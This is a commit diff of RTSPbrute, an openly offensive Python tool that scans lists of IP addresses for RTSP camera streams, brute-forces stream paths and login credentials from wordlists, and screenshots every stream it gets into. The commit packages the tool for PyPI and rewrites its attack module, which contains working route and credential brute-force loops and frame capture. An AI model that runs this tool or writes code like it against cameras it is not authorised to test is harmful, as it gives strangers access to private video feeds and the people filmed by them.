Projects STRLCPY RTSPbrute Commits 472dd3dc
🤬
  • ■ ■ ■ ■ ■ ■
    .gitignore
    skipped 4 lines
    5 5   
    6 6  # Project related
    7 7  reports/
    8  -result.txt
    9  -debug.log
    10 8   
    11 9  # Development
    12 10  .vscode/*
    13 11  rtspbrute-env/
    14  -test*
     12 +test/
    15 13   
     14 +# Deploy
     15 +build/
     16 +dist/
     17 +rtspbrute.egg-info/
  • ■ ■ ■ ■ ■ ■
    .gitlab-ci.yml
     1 +image: python:3.7
     2 + 
     3 +stages:
     4 + - build
     5 + - test
     6 + - release
     7 + 
     8 +packaging:
     9 + stage: build
     10 + script:
     11 + - pip install --upgrade setuptools wheel
     12 + - python3 setup.py sdist bdist_wheel
     13 + artifacts:
     14 + paths:
     15 + - dist
     16 + 
     17 +pytest:
     18 + stage: test
     19 + script:
     20 + - pip install dist/*.whl
     21 + - pip install pytest pytest-cov
     22 + - pytest
     23 + - pytest --cov=rtspbrute
     24 + 
     25 +upload:
     26 + stage: release
     27 + only:
     28 + - tags
     29 + script:
     30 + - pip install --upgrade twine
     31 + - twine upload dist/*
     32 + 
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # RTSPBrute
    2 2   
     3 +[![pipeline status](https://gitlab.com/woolf/RTSPbrute/badges/master/pipeline.svg)](https://gitlab.com/woolf/RTSPbrute/-/commits/master)
     4 +[![coverage report](https://gitlab.com/woolf/RTSPbrute/badges/master/coverage.svg)](https://gitlab.com/woolf/RTSPbrute/-/commits/master)
     5 + 
    3 6  <p align="center">
    4  - <a href="https://asciinema.org/a/351052?autoplay=1" target="_blank"><img src="https://asciinema.org/a/351052.svg" /></a>
     7 + <a href="https://asciinema.org/a/353291" target="_blank"><img src="https://asciinema.org/a/353291.svg" /></a>
    5 8  </p>
    6 9   
    7 10  > Inspired by [Cameradar](https://github.com/Ullaakut/cameradar)
    skipped 22 lines
    30 33  - `Pillow`
    31 34  - `rich`
    32 35   
    33  -### Steps to install
     36 +Install with `pip` or your favorite PyPi package manager.
    34 37   
    35  -1. `git clone https://gitlab.com/woolf/RTSPbrute.git`
    36  -2. `cd RTSPbrute`
    37  -3. `pip install -r requirements.txt`
     38 +```
     39 +pip install rtspbrute
     40 +```
    38 41   
    39 42  ## CLI
    40 43   
    41 44  ```
    42 45  USAGE
    43  - $ core.py [-h] [-t TARGETS] [-p PORTS [PORTS ...]] [-r ROUTES] [-c CREDENTIALS]
    44  - [-ct N] [-bt N] [-st N] [-T TIMEOUT] [-d]
     46 + $ rtspbrute -t TARGETS [-p PORTS [PORTS ...]] [-r ROUTES] [-c CREDENTIALS]
     47 + [-ct N] [-bt N] [-st N] [-T TIMEOUT] [-d] [-h]
    45 48   
    46 49  ARGUMENTS
    47 50   -h, --help show this help message and exit
    skipped 8 lines
    56 59   -d, --debug enable the debug logs
    57 60   
    58 61  EXAMPLES
    59  - $ python core.py
    60  - $ python core.py -t ips.txt -p 554 5554
    61  - $ python core.py -r paths.txt -c combinations.txt
    62  - $ python core.py -st 10 -T 10
     62 + $ rtspbrute -h
     63 + $ rtspbrute -t hosts.txt -p 554 5554 8554 -d
     64 + $ rtspbrute -t ips.txt -r routes.txt -c combinations.txt
     65 + $ rtspbrute -t targets.txt -st 10 -T 10
    63 66  ```
    64 67   
    65  -- **"-t, --targets"** (`hosts.txt`): Set custom path to the input file. The file can contain IPs, IP ranges and CIDRs. Each one of them should be on a separate line, e.g.:
     68 +### **"argument"** (`default_value`):
     69 + 
     70 +- **"-t, --targets"** (_No default value_): Set the path to the input file. The file can contain IPs, IP ranges and CIDRs. Each one of them should be on a separate line, e.g.:
    66 71   
    67 72  ```
    68 73  0.0.0.0
    skipped 23 lines
    92 97  - **"-T, --timeout"** (`2`): Set custom timeout value for socket connections
    93 98  - **"-d, --debug"** (`False`): Enable debug logging to `debug.log` file
    94 99   
    95  -## TODO
    96  - 
    97  -- [x] Add support for multiple ports
    98  -- [ ] Optimize for large input
    99  -- [ ] Add tests
    100  -- [x] Add CLI
    101  -- [x] Beautify format of output to terminal
    102  -- [ ] Release on PyPI
    103  - 
  • ■ ■ ■ ■ ■ ■
    config.py
    1  -import time
    2  -from pathlib import Path
    3  -from typing import List
    4  - 
    5  -from modules.cli.output import progress_bar
    6  - 
    7  -ROUTES: List[str]
    8  -CREDENTIALS: List[str]
    9  -PORTS: List[int]
    10  - 
    11  -CHECK_PROGRESS = progress_bar.add_task("[bright_red]Checking...", total=0)
    12  -BRUTE_PROGRESS = progress_bar.add_task("[bright_yellow]Bruting...", total=0)
    13  -SCREENSHOT_PROGRESS = progress_bar.add_task("[bright_green]Screenshoting...", total=0)
    14  - 
    15  -start_datetime = time.strftime("%Y.%m.%d-%H.%M.%S")
    16  -DEBUG_LOG_FILE = Path.cwd() / "debug.log"
    17  -REPORT_FOLDER = Path.cwd() / "reports" / start_datetime
    18  -PICS_FOLDER = REPORT_FOLDER / "pics"
    19  -RESULT_FILE = REPORT_FOLDER / "result.txt"
    20  -HTML_FILE = REPORT_FOLDER / "index.html"
    21  - 
  • ■ ■ ■ ■ ■ ■
    core.py
    1  -import collections
    2  -import logging
    3  -import threading
    4  -from queue import Queue
    5  -from typing import Callable, List
    6  - 
    7  -import av
    8  -from rich.panel import Panel
    9  - 
    10  -import config
    11  -from modules import utils, worker
    12  -from modules.cli.input import parser
    13  -from modules.cli.output import console
    14  -from modules.rtsp import RTSPClient
    15  - 
    16  - 
    17  -def start_threads(number: int, target: Callable, *args) -> List[threading.Thread]:
    18  - debugger.debug(
    19  - f"Starting {number} threads of {target.__module__}.{target.__name__}"
    20  - )
    21  - threads = []
    22  - for _ in range(number):
    23  - thread = threading.Thread(target=target, args=args)
    24  - thread.daemon = True
    25  - threads.append(thread)
    26  - thread.start()
    27  - return threads
    28  - 
    29  - 
    30  -def wait_for(queue: Queue, threads: List[threading.Thread]):
    31  - """Waits for queue and then threads to finish."""
    32  - queue.join()
    33  - [queue.put(None) for _ in range(len(threads))]
    34  - [t.join() for t in threads]
    35  - 
    36  - 
    37  -if __name__ == "__main__":
    38  - args = parser.parse_args()
    39  - 
    40  - # Logging module set up
    41  - debugger = logging.getLogger("debugger")
    42  - debugger.setLevel(logging.DEBUG)
    43  - if args.debug:
    44  - file_handler = logging.FileHandler(config.DEBUG_LOG_FILE, "w")
    45  - file_handler.setFormatter(
    46  - logging.Formatter(
    47  - "[%(asctime)s] [%(levelname)s] [%(threadName)s] [%(funcName)s] %(message)s"
    48  - )
    49  - )
    50  - debugger.addHandler(file_handler)
    51  - else:
    52  - debugger.addHandler(logging.NullHandler())
    53  - debugger.propagate = False
    54  - 
    55  - # Redirect PyAV logs only to file
    56  - libav_logger = logging.getLogger("libav")
    57  - libav_logger.setLevel(logging.DEBUG)
    58  - if args.debug:
    59  - libav_logger.addHandler(file_handler)
    60  - libav_logger.propagate = False
    61  - av_logger = logging.getLogger("av")
    62  - av_logger.setLevel(logging.DEBUG)
    63  - if args.debug:
    64  - av_logger.addHandler(file_handler)
    65  - av_logger.propagate = False
    66  - # This disables ValueError from av module printing to console, but this also
    67  - # means we won't get any logs from av, if they aren't FATAL or PANIC level.
    68  - av.logging.set_level(av.logging.FATAL)
    69  - 
    70  - targets = collections.deque(set(utils.load_txt(args.targets, "targets")))
    71  - config.ROUTES = utils.load_txt(args.routes, "routes")
    72  - config.CREDENTIALS = utils.load_txt(args.credentials, "credentials")
    73  - 
    74  - config.PORTS = args.ports
    75  - 
    76  - utils.create_folder(config.PICS_FOLDER)
    77  - utils.create_file(config.RESULT_FILE)
    78  - utils.generate_html(config.HTML_FILE)
    79  - 
    80  - check_queue = Queue()
    81  - brute_queue = Queue()
    82  - screenshot_queue = Queue()
    83  - 
    84  - check_threads = start_threads(
    85  - args.check_threads, worker.brute_routes, check_queue, brute_queue
    86  - )
    87  - brute_threads = start_threads(
    88  - args.brute_threads, worker.brute_credentials, brute_queue, screenshot_queue
    89  - )
    90  - screenshot_threads = start_threads(
    91  - args.screenshot_threads, worker.screenshot_targets, screenshot_queue
    92  - )
    93  - 
    94  - console.print("[green]Starting...\n")
    95  - 
    96  - config.progress_bar.update(config.CHECK_PROGRESS, total=len(targets))
    97  - config.progress_bar.start()
    98  - while targets:
    99  - check_queue.put(RTSPClient(ip=targets.popleft(), timeout=args.timeout))
    100  - 
    101  - wait_for(check_queue, check_threads)
    102  - debugger.debug("Check queue and threads finished")
    103  - wait_for(brute_queue, brute_threads)
    104  - debugger.debug("Brute queue and threads finished")
    105  - wait_for(screenshot_queue, screenshot_threads)
    106  - debugger.debug("Screenshot queue and threads finished")
    107  - 
    108  - config.progress_bar.stop()
    109  - 
    110  - print()
    111  - if args.debug:
    112  - file_handler.close()
    113  - config.DEBUG_LOG_FILE.rename(config.REPORT_FOLDER / config.DEBUG_LOG_FILE.name)
    114  - screenshots = list(config.PICS_FOLDER.iterdir())
    115  - console.print(f"[green]Saved {len(screenshots)} screenshots")
    116  - console.print(
    117  - Panel(
    118  - f"[bright_green]{str(config.REPORT_FOLDER)}", title="Report", expand=False
    119  - ),
    120  - justify="center",
    121  - )
    122  - 
  • hosts.txt
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    modules/attack.py
    1  -import logging
    2  -import sys
    3  - 
    4  -import av
    5  - 
    6  -import config
    7  -from modules import utils
    8  -from modules.cli.output import console
    9  -from modules.rtsp import RTSPClient, Status
    10  - 
    11  -sys.path.append("..")
    12  - 
    13  -dummy_route = "/0x8b6c42"
    14  -logger = logging.getLogger("debugger")
    15  - 
    16  - 
    17  -def attack(target: RTSPClient, port=None, route=None, credentials=None):
    18  - if port is None:
    19  - port = target.port
    20  - if route is None:
    21  - route = target.route
    22  - if credentials is None:
    23  - credentials = target.credentials
    24  - 
    25  - # Create socket connection.
    26  - ok = target.connect(port)
    27  - if not ok:
    28  - if target.status is Status.UNIDENTIFIED:
    29  - logger.debug(
    30  - f"Failed to connect {str(target)}:", exc_info=target.last_error
    31  - )
    32  - else:
    33  - logger.debug(f"Failed to connect {str(target)}: {target.status.name}")
    34  - return False
    35  - 
    36  - attack_url = RTSPClient.get_rtsp_url(target.ip, port, credentials, route)
    37  - # Try to authorize: create describe packet and send it.
    38  - ok = target.authorize(port, route, credentials)
    39  - request = "\n\t".join(target.packet.split("\r\n")).rstrip()
    40  - if target.data:
    41  - response = "\n\t".join(target.data.split("\r\n")).rstrip()
    42  - else:
    43  - response = ""
    44  - logger.debug(f"\nSent:\n\t{request}\nReceived:\n\t{response}")
    45  - if not ok:
    46  - logger.debug(f"Failed to authorize {attack_url}", exc_info=target.last_error)
    47  - return False
    48  - 
    49  - return True
    50  - 
    51  - 
    52  -def attack_route(target: RTSPClient):
    53  - # If it's a 401 or 403, it means that the credentials are wrong but the route might be okay.
    54  - # If it's a 200, the stream is accessed successfully.
    55  - ok_codes = ["200", "401", "403"]
    56  - 
    57  - # If the stream responds positively to the dummy route, it means
    58  - # it doesn't require (or respect the RFC) a route and the attack
    59  - # can be skipped.
    60  - for port in config.PORTS:
    61  - ok = attack(target, port=port, route=dummy_route)
    62  - if ok and any(code in target.data for code in ok_codes):
    63  - target.port = port
    64  - target.routes.append("/")
    65  - return target
    66  - 
    67  - # Otherwise, bruteforce the routes.
    68  - for route in config.ROUTES:
    69  - ok = attack(target, port=port, route=route)
    70  - if not ok:
    71  - break
    72  - if any(code in target.data for code in ok_codes):
    73  - target.port = port
    74  - target.routes.append(route)
    75  - return target
    76  - 
    77  - 
    78  -def attack_credentials(target: RTSPClient):
    79  - def _log_working_stream():
    80  - console.print("Working stream at", target)
    81  - logger.debug(
    82  - f"Working stream at {str(target)} with {target.auth_method.name} auth"
    83  - )
    84  - 
    85  - if target.is_authorized:
    86  - _log_working_stream()
    87  - return target
    88  - 
    89  - # If it's a 404, it means that the route is incorrect but the credentials might be okay.
    90  - # If it's a 200, the stream is accessed successfully.
    91  - ok_codes = ["200", "404"]
    92  - 
    93  - # If stream responds positively to no credentials, it means
    94  - # it doesn't require them and the attack can be skipped.
    95  - ok = attack(target, credentials=":")
    96  - if ok and any(code in target.data for code in ok_codes):
    97  - _log_working_stream()
    98  - return target
    99  - 
    100  - # Otherwise, bruteforce the routes.
    101  - for cred in config.CREDENTIALS:
    102  - ok = attack(target, credentials=cred)
    103  - if not ok:
    104  - return False
    105  - if any(code in target.data for code in ok_codes):
    106  - target.credentials = cred
    107  - _log_working_stream()
    108  - return target
    109  - 
    110  - 
    111  -def get_screenshot(target: RTSPClient, tries=0):
    112  - file_name = utils.escape_chars(f"{str(target).lstrip('rtsp://')}.jpg")
    113  - file_path = config.PICS_FOLDER / file_name
    114  - 
    115  - try:
    116  - with av.open(
    117  - str(target),
    118  - options={
    119  - "rtsp_transport": "tcp",
    120  - "rtsp_flags": "prefer_tcp",
    121  - "stimeout": "3000000",
    122  - },
    123  - timeout=60.0,
    124  - ) as video:
    125  - if (
    126  - video.streams.video[0].profile is None
    127  - and video.streams.video[0].start_time is None
    128  - and video.streams.video[0].codec_context.format is None
    129  - ):
    130  - # There's a high possibility that this video stream is broken
    131  - # or something else, so we try again just to make sure
    132  - if tries == 2:
    133  - video.close()
    134  - tries += 1
    135  - return get_screenshot(target, tries)
    136  - else:
    137  - logger.debug(
    138  - f"Broken video stream or unknown issues with {str(target)}"
    139  - )
    140  - return
    141  - video.streams.video[0].thread_type = "AUTO"
    142  - for frame in video.decode(video=0):
    143  - frame.to_image().save(file_path)
    144  - break
    145  - except (MemoryError, PermissionError, av.InvalidDataError) as e:
    146  - # Those errors occurs when there's too much SCREENSHOT_THREADS.
    147  - logger.debug(f"Missed screenshot of {str(target)}: {repr(e)}")
    148  - # Try one more time in hope for luck.
    149  - if tries == 2:
    150  - tries += 1
    151  - console.print("[yellow]Retry to get a screenshot of the", target)
    152  - return get_screenshot(target, tries)
    153  - else:
    154  - console.print(
    155  - f"[italic red]Missed screenshot of [underline]{str(target)}[/underline] - if you see this message a lot, consider reducing the number of screenshot threads",
    156  - )
    157  - return
    158  - except Exception as e:
    159  - logger.debug(f"get_screenshot failed with {str(target)}: {repr(e)}")
    160  - return
    161  - 
    162  - console.print("[bold]Captured screenshot for", target)
    163  - logger.debug(f"Captured screenshot for {str(target)}")
    164  - return file_path
    165  - 
  • ■ ■ ■ ■ ■ ■
    modules/worker.py
    1  -import sys
    2  -from queue import Queue
    3  -from threading import Lock
    4  - 
    5  -import config
    6  - 
    7  -from .attack import attack_credentials, attack_route, get_screenshot
    8  -from .rtsp import RTSPClient
    9  -from .utils import append_result
    10  - 
    11  -sys.path.append("..")
    12  - 
    13  - 
    14  -GLOBAL_LOCK = Lock()
    15  - 
    16  - 
    17  -def brute_routes(input_queue: Queue, output_queue: Queue) -> None:
    18  - while True:
    19  - target: RTSPClient = input_queue.get()
    20  - if target is None:
    21  - break
    22  - 
    23  - result = attack_route(target)
    24  - if result:
    25  - config.progress_bar.add_total(config.BRUTE_PROGRESS)
    26  - output_queue.put(result)
    27  - 
    28  - config.progress_bar.update(config.CHECK_PROGRESS, advance=1)
    29  - input_queue.task_done()
    30  - 
    31  - 
    32  -def brute_credentials(input_queue: Queue, output_queue: Queue) -> None:
    33  - while True:
    34  - target: RTSPClient = input_queue.get()
    35  - if target is None:
    36  - break
    37  - 
    38  - result = attack_credentials(target)
    39  - if result:
    40  - config.progress_bar.add_total(config.SCREENSHOT_PROGRESS)
    41  - output_queue.put(target)
    42  - 
    43  - config.progress_bar.update(config.BRUTE_PROGRESS, advance=1)
    44  - input_queue.task_done()
    45  - 
    46  - 
    47  -def screenshot_targets(input_queue: Queue) -> None:
    48  - while True:
    49  - target: RTSPClient = input_queue.get()
    50  - if target is None:
    51  - break
    52  - 
    53  - image = get_screenshot(target)
    54  - if image:
    55  - append_result(
    56  - GLOBAL_LOCK, config.RESULT_FILE, config.HTML_FILE, image, target
    57  - )
    58  - 
    59  - config.progress_bar.update(config.SCREENSHOT_PROGRESS, advance=1)
    60  - input_queue.task_done()
    61  - 
  • ■ ■ ■ ■ ■ ■
    requirements.txt
    1  -colorama
    2  -Pillow
    3  -rich
     1 +av==8.0.2
     2 +Pillow==7.2.0
     3 +rich==5.1.2
  • ■ ■ ■ ■ ■ ■
    rtspbrute/__init__.py
     1 +from pathlib import Path
     2 + 
     3 +__version__ = "1.0.0"
     4 +DEFAULT_ROUTES = Path(__file__).parent / "routes.txt"
     5 +DEFAULT_CREDENTIALS = Path(__file__).parent / "credentials.txt"
     6 + 
  • ■ ■ ■ ■ ■ ■
    rtspbrute/__main__.py
     1 +import collections
     2 +import logging
     3 +import threading
     4 +import time
     5 +from pathlib import Path
     6 +from queue import Queue
     7 +from typing import Callable, List
     8 + 
     9 +import av
     10 +from rich.panel import Panel
     11 + 
     12 +from rtspbrute.modules import attack, utils, worker
     13 +from rtspbrute.modules.cli.input import parser
     14 +from rtspbrute.modules.cli.output import console, progress_bar
     15 +from rtspbrute.modules.rtsp import RTSPClient
     16 + 
     17 + 
     18 +def start_threads(number: int, target: Callable, *args) -> List[threading.Thread]:
     19 + threads = []
     20 + for _ in range(number):
     21 + thread = threading.Thread(target=target, args=args)
     22 + thread.daemon = True
     23 + threads.append(thread)
     24 + thread.start()
     25 + return threads
     26 + 
     27 + 
     28 +def wait_for(queue: Queue, threads: List[threading.Thread]):
     29 + """Waits for queue and then threads to finish."""
     30 + queue.join()
     31 + [queue.put(None) for _ in range(len(threads))]
     32 + [t.join() for t in threads]
     33 + 
     34 + 
     35 +def main():
     36 + args = parser.parse_args()
     37 + 
     38 + # Folders and files set up
     39 + start_datetime = time.strftime("%Y.%m.%d-%H.%M.%S")
     40 + REPORT_FOLDER = Path.cwd() / "reports" / start_datetime
     41 + attack.PICS_FOLDER = REPORT_FOLDER / "pics"
     42 + utils.RESULT_FILE = REPORT_FOLDER / "result.txt"
     43 + utils.HTML_FILE = REPORT_FOLDER / "index.html"
     44 + utils.create_folder(attack.PICS_FOLDER)
     45 + utils.create_file(utils.RESULT_FILE)
     46 + utils.generate_html(utils.HTML_FILE)
     47 + 
     48 + # Logging module set up
     49 + logger = logging.getLogger()
     50 + attack.logger_is_enabled = args.debug
     51 + if args.debug:
     52 + logger.setLevel(logging.DEBUG)
     53 + file_handler = logging.FileHandler(REPORT_FOLDER / "debug.log")
     54 + file_handler.setFormatter(
     55 + logging.Formatter(
     56 + "[%(asctime)s] [%(levelname)s] [%(threadName)s] [%(funcName)s] %(message)s"
     57 + )
     58 + )
     59 + logger.addHandler(file_handler)
     60 + # This disables ValueError from av module printing to console, but this also
     61 + # means we won't get any logs from av, if they aren't FATAL or PANIC level.
     62 + av.logging.set_level(av.logging.FATAL)
     63 + 
     64 + # Progress output set up
     65 + worker.PROGRESS_BAR = progress_bar
     66 + worker.CHECK_PROGRESS = progress_bar.add_task("[bright_red]Checking...", total=0)
     67 + worker.BRUTE_PROGRESS = progress_bar.add_task("[bright_yellow]Bruting...", total=0)
     68 + worker.SCREENSHOT_PROGRESS = progress_bar.add_task(
     69 + "[bright_green]Screenshoting...", total=0
     70 + )
     71 + 
     72 + # Targets, routes, credentials and ports set up
     73 + targets = collections.deque(set(utils.load_txt(args.targets, "targets")))
     74 + attack.ROUTES = utils.load_txt(args.routes, "routes")
     75 + attack.CREDENTIALS = utils.load_txt(args.credentials, "credentials")
     76 + attack.PORTS = args.ports
     77 + 
     78 + check_queue = Queue()
     79 + brute_queue = Queue()
     80 + screenshot_queue = Queue()
     81 + 
     82 + if args.debug:
     83 + logger.debug(f"Starting {args.check_threads} threads of worker.brute_routes")
     84 + check_threads = start_threads(
     85 + args.check_threads, worker.brute_routes, check_queue, brute_queue
     86 + )
     87 + if args.debug:
     88 + logger.debug(
     89 + f"Starting {args.brute_threads} threads of worker.brute_credentials"
     90 + )
     91 + brute_threads = start_threads(
     92 + args.brute_threads, worker.brute_credentials, brute_queue, screenshot_queue
     93 + )
     94 + if args.debug:
     95 + logger.debug(
     96 + f"Starting {args.screenshot_threads} threads of worker.screenshot_targets"
     97 + )
     98 + screenshot_threads = start_threads(
     99 + args.screenshot_threads, worker.screenshot_targets, screenshot_queue
     100 + )
     101 + 
     102 + console.print("[green]Starting...\n")
     103 + 
     104 + progress_bar.update(worker.CHECK_PROGRESS, total=len(targets))
     105 + progress_bar.start()
     106 + while targets:
     107 + check_queue.put(RTSPClient(ip=targets.popleft(), timeout=args.timeout))
     108 + 
     109 + wait_for(check_queue, check_threads)
     110 + if args.debug:
     111 + logger.debug("Check queue and threads finished")
     112 + wait_for(brute_queue, brute_threads)
     113 + if args.debug:
     114 + logger.debug("Brute queue and threads finished")
     115 + wait_for(screenshot_queue, screenshot_threads)
     116 + if args.debug:
     117 + logger.debug("Screenshot queue and threads finished")
     118 + 
     119 + progress_bar.stop()
     120 + 
     121 + print()
     122 + screenshots = list(attack.PICS_FOLDER.iterdir())
     123 + console.print(f"[green]Saved {len(screenshots)} screenshots")
     124 + console.print(
     125 + Panel(f"[bright_green]{str(REPORT_FOLDER)}", title="Report", expand=False),
     126 + justify="center",
     127 + )
     128 + 
     129 + 
     130 +if __name__ == "__main__":
     131 + main()
     132 + 
  • credentials.txt rtspbrute/credentials.txt
    Content is identical
  • modules/__init__.py rtspbrute/modules/__init__.py
    Content is identical
  • ■ ■ ■ ■ ■ ■
    rtspbrute/modules/attack.py
     1 +import logging
     2 +from pathlib import Path
     3 +from typing import List
     4 + 
     5 +import av
     6 + 
     7 +from rtspbrute.modules.cli.output import console
     8 +from rtspbrute.modules.rtsp import RTSPClient, Status
     9 +from rtspbrute.modules.utils import escape_chars
     10 + 
     11 +ROUTES: List[str]
     12 +CREDENTIALS: List[str]
     13 +PORTS: List[int]
     14 +PICS_FOLDER: Path
     15 + 
     16 +DUMMY_ROUTE = "/0x8b6c42"
     17 +MAX_SCREENSHOT_TRIES = 2
     18 + 
     19 +logger = logging.getLogger()
     20 +logger_is_enabled = logger.isEnabledFor(logging.DEBUG)
     21 + 
     22 + 
     23 +def attack(target: RTSPClient, port=None, route=None, credentials=None):
     24 + if port is None:
     25 + port = target.port
     26 + if route is None:
     27 + route = target.route
     28 + if credentials is None:
     29 + credentials = target.credentials
     30 + 
     31 + # Create socket connection.
     32 + connected = target.connect(port)
     33 + if not connected:
     34 + if logger_is_enabled:
     35 + if target.status is Status.UNIDENTIFIED:
     36 + logger.debug(f"Failed to connect {target}:", exc_info=target.last_error)
     37 + else:
     38 + logger.debug(f"Failed to connect {target}: {target.status.name}")
     39 + return False
     40 + 
     41 + # Try to authorize: create describe packet and send it.
     42 + authorized = target.authorize(port, route, credentials)
     43 + if logger_is_enabled:
     44 + request = "\n\t".join(target.packet.split("\r\n")).rstrip()
     45 + if target.data:
     46 + response = "\n\t".join(target.data.split("\r\n")).rstrip()
     47 + else:
     48 + response = ""
     49 + logger.debug(f"\nSent:\n\t{request}\nReceived:\n\t{response}")
     50 + if not authorized:
     51 + if logger_is_enabled:
     52 + attack_url = RTSPClient.get_rtsp_url(target.ip, port, credentials, route)
     53 + logger.debug(
     54 + f"Failed to authorize {attack_url}", exc_info=target.last_error
     55 + )
     56 + return False
     57 + 
     58 + return True
     59 + 
     60 + 
     61 +def attack_route(target: RTSPClient):
     62 + # If it's a 401 or 403, it means that the credentials are wrong but the route might be okay.
     63 + # If it's a 200, the stream is accessed successfully.
     64 + ok_codes = ["200", "401", "403"]
     65 + 
     66 + # If the stream responds positively to the dummy route, it means
     67 + # it doesn't require (or respect the RFC) a route and the attack
     68 + # can be skipped.
     69 + for port in PORTS:
     70 + ok = attack(target, port=port, route=DUMMY_ROUTE)
     71 + if ok and any(code in target.data for code in ok_codes):
     72 + target.port = port
     73 + target.routes.append("/")
     74 + return target
     75 + 
     76 + # Otherwise, bruteforce the routes.
     77 + for route in ROUTES:
     78 + ok = attack(target, port=port, route=route)
     79 + if not ok:
     80 + break
     81 + if any(code in target.data for code in ok_codes):
     82 + target.port = port
     83 + target.routes.append(route)
     84 + return target
     85 + 
     86 + 
     87 +def attack_credentials(target: RTSPClient):
     88 + def _log_working_stream():
     89 + console.print("Working stream at", target)
     90 + if logger_is_enabled:
     91 + logger.debug(
     92 + f"Working stream at {target} with {target.auth_method.name} auth"
     93 + )
     94 + 
     95 + if target.is_authorized:
     96 + _log_working_stream()
     97 + return target
     98 + 
     99 + # If it's a 404, it means that the route is incorrect but the credentials might be okay.
     100 + # If it's a 200, the stream is accessed successfully.
     101 + ok_codes = ["200", "404"]
     102 + 
     103 + # If stream responds positively to no credentials, it means
     104 + # it doesn't require them and the attack can be skipped.
     105 + ok = attack(target, credentials=":")
     106 + if ok and any(code in target.data for code in ok_codes):
     107 + _log_working_stream()
     108 + return target
     109 + 
     110 + # Otherwise, bruteforce the routes.
     111 + for cred in CREDENTIALS:
     112 + ok = attack(target, credentials=cred)
     113 + if not ok:
     114 + break
     115 + if any(code in target.data for code in ok_codes):
     116 + target.credentials = cred
     117 + _log_working_stream()
     118 + return target
     119 + 
     120 + 
     121 +def _is_video_stream(stream):
     122 + return (
     123 + stream.profile is not None
     124 + and stream.start_time is not None
     125 + and stream.codec_context.format is not None
     126 + )
     127 + 
     128 + 
     129 +def get_screenshot(rtsp_url: str, tries=1):
     130 + try:
     131 + with av.open(
     132 + rtsp_url,
     133 + options={
     134 + "rtsp_transport": "tcp",
     135 + "rtsp_flags": "prefer_tcp",
     136 + "stimeout": "3000000",
     137 + },
     138 + timeout=60.0,
     139 + ) as container:
     140 + stream = container.streams.video[0]
     141 + if _is_video_stream(stream):
     142 + file_name = escape_chars(f"{rtsp_url.lstrip('rtsp://')}.jpg")
     143 + file_path = PICS_FOLDER / file_name
     144 + stream.thread_type = "AUTO"
     145 + for frame in container.decode(video=0):
     146 + frame.to_image().save(file_path)
     147 + break
     148 + console.print(
     149 + f"[bold]Captured screenshot for", f"[underline cyan]{rtsp_url}",
     150 + )
     151 + if logger_is_enabled:
     152 + logger.debug(f"Captured screenshot for {rtsp_url}")
     153 + return file_path
     154 + else:
     155 + # There's a high possibility that this video stream is broken
     156 + # or something else, so we try again just to make sure.
     157 + if tries < MAX_SCREENSHOT_TRIES:
     158 + container.close()
     159 + tries += 1
     160 + return get_screenshot(rtsp_url, tries)
     161 + else:
     162 + if logger_is_enabled:
     163 + logger.debug(
     164 + f"Broken video stream or unknown issues with {rtsp_url}"
     165 + )
     166 + return
     167 + except (MemoryError, PermissionError, av.InvalidDataError) as e:
     168 + # These errors occur when there's too much SCREENSHOT_THREADS.
     169 + if logger_is_enabled:
     170 + logger.debug(f"Missed screenshot of {rtsp_url}: {repr(e)}")
     171 + # Try one more time in hope for luck.
     172 + if tries < MAX_SCREENSHOT_TRIES:
     173 + tries += 1
     174 + console.print(
     175 + f"[yellow]Retry to get a screenshot of the [underline]{rtsp_url}"
     176 + )
     177 + return get_screenshot(rtsp_url, tries)
     178 + else:
     179 + console.print(
     180 + f"[italic red]Missed screenshot of [underline]{rtsp_url}[/underline] - if you see this message a lot, consider reducing the number of screenshot threads",
     181 + )
     182 + return
     183 + except Exception as e:
     184 + if logger_is_enabled:
     185 + logger.debug(f"get_screenshot failed with {rtsp_url}: {repr(e)}")
     186 + return
     187 + 
  • ■ ■ ■ ■ ■
    rtspbrute/modules/cli/__init__.py
     1 + 
  • ■ ■ ■ ■ ■
    modules/cli/input.py rtspbrute/modules/cli/input.py
    1 1  import argparse
     2 +from pathlib import Path
     3 +from typing import Any
     4 + 
     5 +from rtspbrute import DEFAULT_CREDENTIALS, DEFAULT_ROUTES, __version__
    2 6   
    3 7   
    4 8  class CustomHelpFormatter(argparse.HelpFormatter):
    skipped 8 lines
    13 17   return ", ".join(action.option_strings) + " " + args_string
    14 18   
    15 19   
     20 +def file_path(value: Any):
     21 + if Path(value).exists():
     22 + return Path(value)
     23 + else:
     24 + raise argparse.ArgumentTypeError(f"{value} is not a valid path")
     25 + 
     26 + 
     27 +def port(value: Any):
     28 + if int(value) in range(65536):
     29 + return int(value)
     30 + else:
     31 + raise argparse.ArgumentTypeError(f"{value} is not a valid port")
     32 + 
     33 + 
    16 34  fmt = lambda prog: CustomHelpFormatter(prog)
    17 35  parser = argparse.ArgumentParser(
     36 + prog="rtspbrute",
    18 37   description="Tool for RTSP that brute-forces routes and credentials, makes screenshots!",
    19 38   formatter_class=fmt,
    20 39  )
    21 40  parser.add_argument(
    22 41   "-t",
    23 42   "--targets",
    24  - default="hosts.txt",
     43 + type=file_path,
     44 + required=True,
    25 45   help="the targets on which to scan for open RTSP streams",
    26 46  )
    27 47  parser.add_argument(
    skipped 1 lines
    29 49   "--ports",
    30 50   nargs="+",
    31 51   default=[554],
    32  - type=int,
     52 + type=port,
    33 53   help="the ports on which to search for RTSP streams",
    34 54  )
    35 55  parser.add_argument(
    36 56   "-r",
    37 57   "--routes",
    38  - default="routes.txt",
     58 + type=file_path,
     59 + default=DEFAULT_ROUTES,
    39 60   help="the path on which to load a custom routes",
    40 61  )
    41 62  parser.add_argument(
    42 63   "-c",
    43 64   "--credentials",
    44  - default="credentials.txt",
     65 + type=file_path,
     66 + default=DEFAULT_CREDENTIALS,
    45 67   help="the path on which to load a custom credentials",
    46 68  )
    47 69  parser.add_argument(
    skipped 24 lines
    72 94   "-T", "--timeout", default=2, type=int, help="the timeout to use for sockets"
    73 95  )
    74 96  parser.add_argument("-d", "--debug", action="store_true", help="enable the debug logs")
     97 +parser.add_argument("--version", action="version", version=f"%(prog)s {__version__}")
    75 98   
  • ■ ■ ■ ■
    modules/cli/output.py rtspbrute/modules/cli/output.py
    skipped 2 lines
    3 3   
    4 4   
    5 5  class ProgressBar(Progress):
    6  - def __init__(self, console: Console) -> None:
     6 + def __init__(self, console: Console = Console()) -> None:
    7 7   super().__init__(
    8 8   "[progress.description]{task.description}",
